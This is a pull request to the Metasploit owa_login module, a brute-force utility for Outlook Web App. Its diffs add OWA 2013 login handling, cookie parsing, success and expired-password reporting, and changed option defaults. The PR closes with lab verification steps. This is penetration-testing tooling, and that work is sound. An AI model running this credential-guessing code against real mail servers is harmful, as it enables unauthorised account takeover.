### PR TITLE
Owa login

### DIFF
--- a/modules/auxiliary/scanner/http/owa_login.rb
+++ b/modules/auxiliary/scanner/http/owa_login.rb
@@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary
           'SecureState R&D Team',
           'sinn3r',
           'Brandon Knight',
-          'Pete Arzamendi -> Outlook 2013 updates'
+          'Pete (Bokojan) Arzamendi, #Outlook 2013 updates'
         ],
  
       'License'        => MSF_LICENSE,
@@ -71,16 +71,18 @@ class Metasploit3 < Msf::Auxiliary
             }
           ]
         ],
-      'DefaultAction' => 'OWA_2010'
+      'DefaultAction' => 'OWA_2010',
+      'DefaultOptions' => { 
+        'SSL' => true 
+      }  
     )
 
-    'DefaultOptions' => { 'SSL' => true }
 
     register_options(
       [
         OptInt.new('RPORT', [ true, "The target port", 443]),
         OptAddress.new('RHOST', [ true, "The target address", true]),
-        OptBool.new('ENUM_DOMAIN', [ true, "Automatically enumerate AD domain using NTLM authentication", false]),
+        OptBool.new('ENUM_DOMAIN', [ true, "Automatically enumerate AD domain using NTLM authentication", true]),
       ], self.class)
 
 
@@ -225,14 +227,8 @@ class Metasploit3 < Msf::Auxiliary
 
       #No password change required moving on. 
       reason = res.headers['location'].split('reason=')[1]
-      if reason == nil
-        #Get cdata auth cookies from headers. Wookie
-        cadata_cookies = res.headers['set-cookie'].scan(/cadata.*?=.*?;/)
-        cookieMonster = ""
-        cadata_cookies.each do | cookie |
-          cookieMonster += cookie.to_s
-        end
-        headers['Cookie'] = 'PBack=0;' << cookieMonster
+      if reason == nil  
+        headers['Cookie'] = 'PBack=0;' << res.get_cookies
       else 
       #Login didn't work. no point on going on.
         vprint_error("#{msg} FAILED LOGIN. '#{user}' : '#{pass}'") 

--- a/modules/auxiliary/scanner/http/owa_login.rb
+++ b/modules/auxiliary/scanner/http/owa_login.rb
@@ -28,8 +28,9 @@ class Metasploit3 < Msf::Auxiliary
           'SecureState R&D Team',
           'sinn3r',
           'Brandon Knight',
-          'Pete -> Outlook 2013 updates'
+          'Pete Arzamendi -> Outlook 2013 updates'
         ],
+ 
       'License'        => MSF_LICENSE,
       'Actions'        =>
         [
@@ -73,13 +74,15 @@ class Metasploit3 < Msf::Auxiliary
       'DefaultAction' => 'OWA_2010'
     )
 
+    'DefaultOptions' => { 'SSL' => true }
+
     register_options(
       [
         OptInt.new('RPORT', [ true, "The target port", 443]),
         OptAddress.new('RHOST', [ true, "The target address", true]),
         OptBool.new('ENUM_DOMAIN', [ true, "Automatically enumerate AD domain using NTLM authentication", false]),
-        OptBool.new('SSL', [ true, "Negotiate SSL for outgoing connections", true])
       ], self.class)
+
 
     register_advanced_options(
       [

--- a/modules/auxiliary/scanner/http/owa_login.rb
+++ b/modules/auxiliary/scanner/http/owa_login.rb
@@ -86,7 +86,7 @@ class Metasploit3 < Msf::Auxiliary
         OptString.new('AD_DOMAIN', [ false, "Optional AD domain to prepend to usernames", ''])
       ], self.class)
 
-    deregister_options('BLANK_PASSWORDS', 'RHOSTS')
+    deregister_options('BLANK_PASSWORDS', 'RHOSTS','PASSWORD','USERNAME')
   end
 
   def cleanup
@@ -101,8 +101,6 @@ class Metasploit3 < Msf::Auxiliary
 
     # OWA doesn't support blank passwords or usernames!
     datastore['BLANK_PASSWORDS'] = false
-    datastore['USERNAME'] = nil
-    datastore['PASSWORD'] = nil
 
     # If there's a pre-defined username/password, we need to turn off USER_AS_PASS
     # so that the module won't just try username:username, and then exit.
@@ -141,6 +139,7 @@ class Metasploit3 < Msf::Auxiliary
 
     begin
       each_user_pass do |user, pass|
+        next if (user.blank? or pass.blank?)
         vprint_status("#{msg} Trying #{user} : #{pass}")
         try_user_pass({"user" => user, "domain"=>domain, "pass"=>pass, "auth_path"=>auth_path, "inbox_path"=>inbox_path, "login_check"=>login_check, "vhost"=>vhost})
       end
@@ -157,6 +156,8 @@ class Metasploit3 < Msf::Auxiliary
     login_check = opts["login_check"]
     vhost = opts["vhost"]
     domain = opts["domain"]
+
+    
 
     user = domain + '\\' + user if domain
 

--- a/modules/auxiliary/scanner/http/owa_login.rb
+++ b/modules/auxiliary/scanner/http/owa_login.rb
@@ -11,12 +11,14 @@ class Metasploit3 < Msf::Auxiliary
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::AuthBrute
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+
 
   def initialize
     super(
       'Name'           => 'Outlook Web App (OWA) Brute Force Utility',
       'Description'    => %q{
-        This module tests credentials on OWA 2003, 2007 and 2010 servers. The default
+        This module tests credentials on OWA 2003, 2007, 2010, 2013 servers. The default
         action is set to OWA 2010.
       },
       'Author'         =>
@@ -25,13 +27,14 @@ class Metasploit3 < Msf::Auxiliary
           'Spencer McIntyre',
           'SecureState R&D Team',
           'sinn3r',
-          'Brandon Knight'
+          'Brandon Knight',
+          'Pete -> Outlook 2013 updates'
         ],
       'License'        => MSF_LICENSE,
       'Actions'        =>
         [
           [
-            'OWA 2003',
+            'OWA_2003',
             {
               'Description' => 'OWA version 2003',
               'AuthPath'    => '/exchweb/bin/auth/owaauth.dll',
@@ -40,7 +43,7 @@ class Metasploit3 < Msf::Auxiliary
             }
           ],
           [
-            'OWA 2007',
+            'OWA_2007',
             {
               'Description' => 'OWA version 2007',
               'AuthPath'    => '/owa/auth/owaauth.dll',
@@ -49,31 +52,41 @@ class Metasploit3 < Msf::Auxiliary
             }
           ],
           [
-            'OWA 2010',
+            'OWA_2010',
             {
               'Description' => 'OWA version 2010',
               'AuthPath'    => '/owa/auth.owa',
               'InboxPath'   => '/owa/',
               'InboxCheck'  => /Inbox|location(\x20*)=(\x20*)"\\\/(\w+)\\\/logoff\.owa|A mailbox couldn\'t be found|\<a .+onclick="return JumpTo\('logoff\.aspx.+\">/
             }
+          ],
+          [  
+            'OWA_2013',
+            {
+              'Description' => 'OWA version 2013',
+              'AuthPath'    => '/owa/auth.owa',
+              'InboxPath'   => '/owa/',
+              'InboxCheck'  => /Inbox|logoff\.owa/
+            }
           ]
         ],
-      'DefaultAction' => 'OWA 2010'
+      'DefaultAction' => 'OWA_2010'
     )
 
     register_options(
       [
         OptInt.new('RPORT', [ true, "The target port", 443]),
-      ], self.class)
-
-    register_advanced_options(
-      [
-        OptString.new('AD_DOMAIN', [ false, "Optional AD domain to prepend to usernames", '']),
+        OptAddress.new('RHOST', [ true, "The target address", true]),
         OptBool.new('ENUM_DOMAIN', [ true, "Automatically enumerate AD domain using NTLM authentication", false]),
         OptBool.new('SSL', [ true, "Negotiate SSL for outgoing connections", true])
       ], self.class)
 
-    deregister_options('BLANK_PASSWORDS')
+    register_advanced_options(
+      [
+        OptString.new('AD_DOMAIN', [ false, "Optional AD domain to prepend to usernames", ''])
+      ], self.class)
+
+    deregister_options('BLANK_PASSWORDS', 'RHOSTS')
   end
 
   def cleanup
@@ -86,8 +99,10 @@ class Metasploit3 < Msf::Auxiliary
     # Store the original setting
     @blank_passwords_setting = datastore['BLANK_PASSWORDS']
 
-    # OWA doesn't support blank passwords
+    # OWA doesn't support blank passwords or usernames!
     datastore['BLANK_PASSWORDS'] = false
+    datastore['USERNAME'] = nil
+    datastore['PASSWORD'] = nil
 
     # If there's a pre-defined username/password, we need to turn off USER_AS_PASS
     # so that the module won't just try username:username, and then exit.
@@ -150,9 +165,17 @@ class Metasploit3 < Msf::Auxiliary
     }
 
     if (datastore['SSL'].to_s.match(/^(t|y|1)/i))
-      data = 'destination=https://' << vhost << '&flags=0&trusted=0&username=' << user << '&password=' << pass
+      if action.name == "OWA_2013"
+        data = 'destination=https://' << vhost << '/owa&flags=4&forcedownlevel=0&username=' << user << '&password=' << pass << '&isUtf8=1'
+      else
+        data = 'destination=https://' << vhost << '&flags=0&trusted=0&username=' << user << '&password=' << pass
+      end
     else
-      data = 'destination=http://' << vhost << '&flags=0&trusted=0&username=' << user << '&password=' << pass
+      if action.name == "OWA_2013"
+        data = 'destination=http://' << vhost << '/owa&flags=4&forcedownlevel=0&username=' << user << '&password=' << pass << '&isUtf8=1'
+      else
+        data = 'destination=http://' << vhost << '&flags=0&trusted=0&username=' << user << '&password=' << pass
+      end
     end
 
     begin
@@ -174,16 +197,49 @@ class Metasploit3 < Msf::Auxiliary
       return :abort
     end
 
-    if not res.headers['set-cookie']
-      print_error("#{msg} Received invalid repsonse due to a missing cookie (possibly due to invalid version), aborting")
-      return :abort
+    if action.name != "OWA_2013" and not res.headers['set-cookie']
+        print_error("#{msg} Received invalid repsonse due to a missing cookie (possibly due to invalid version), aborting")
+        return :abort
     end
+    if action.name == "OWA_2013"
+      #Check for a response code to make sure login was valid. Changes from 2010 to 2013.  
+      #Check if the password needs to be changed. 
+      if res.headers['location'] =~ /expiredpassword/
+        print_good("#{msg} SUCCESSFUL LOGIN. '#{user}' : '#{pass}': NOTE password change required")
+        report_hash = {
+          :host   => datastore['RHOST'],
+          :port   => datastore['RPORT'],
+          :sname  => 'owa',
+          :user   => user,
+          :pass   => pass,
+          :active => true,
+          :type => 'password'}
 
-    # these two lines are the authentication info
-    sessionid = 'sessionid=' << res.headers['set-cookie'].split('sessionid=')[1].split('; ')[0]
-    cadata = 'cadata=' << res.headers['set-cookie'].split('cadata=')[1].split('; ')[0]
+        report_auth_info(report_hash)
+        return :next_user
+      end
 
-    headers['Cookie'] = 'PBack=0; ' << sessionid << '; ' << cadata
+      #No password change required moving on. 
+      reason = res.headers['location'].split('reason=')[1]
+      if reason == nil
+        #Get cdata auth cookies from headers. Wookie
+        cadata_cookies = res.headers['set-cookie'].scan(/cadata.*?=.*?;/)
+        cookieMonster = ""
+        cadata_cookies.each do | cookie |
+          cookieMonster += cookie.to_s
+        end
+        headers['Cookie'] = 'PBack=0;' << cookieMonster
+      else 
+      #Login didn't work. no point on going on.
+        vprint_error("#{msg} FAILED LOGIN. '#{user}' : '#{pass}'") 
+        return :Skip_pass
+      end
+    else
+       # these two lines are the authentication info
+      sessionid = 'sessionid=' << res.headers['set-cookie'].split('sessionid=')[1].split('; ')[0]
+      cadata = 'cadata=' << res.headers['set-cookie'].split('cadata=')[1].split('; ')[0]
+      headers['Cookie'] = 'PBack=0; ' << sessionid << '; ' << cadata
+    end
 
     begin
       res = send_request_cgi({


### PR DESCRIPTION
Added support for OWA 2013. 
Moved ENUM_DOMAIN, AD_DOMAIN, SSL out of Advanced options so they are easer to find. 
Removed spaces from the actions. 

Verification steps for 2014:
- [x] Install Exchange 2013
- [x] Setup OWA 2013
- [x] Enable mailboxes on two user accounts. 
- [x] Have one user account configured so they have to change their password on next login. 
    The account should show success but note the password needs to be changed.

If you have any questions let me know.
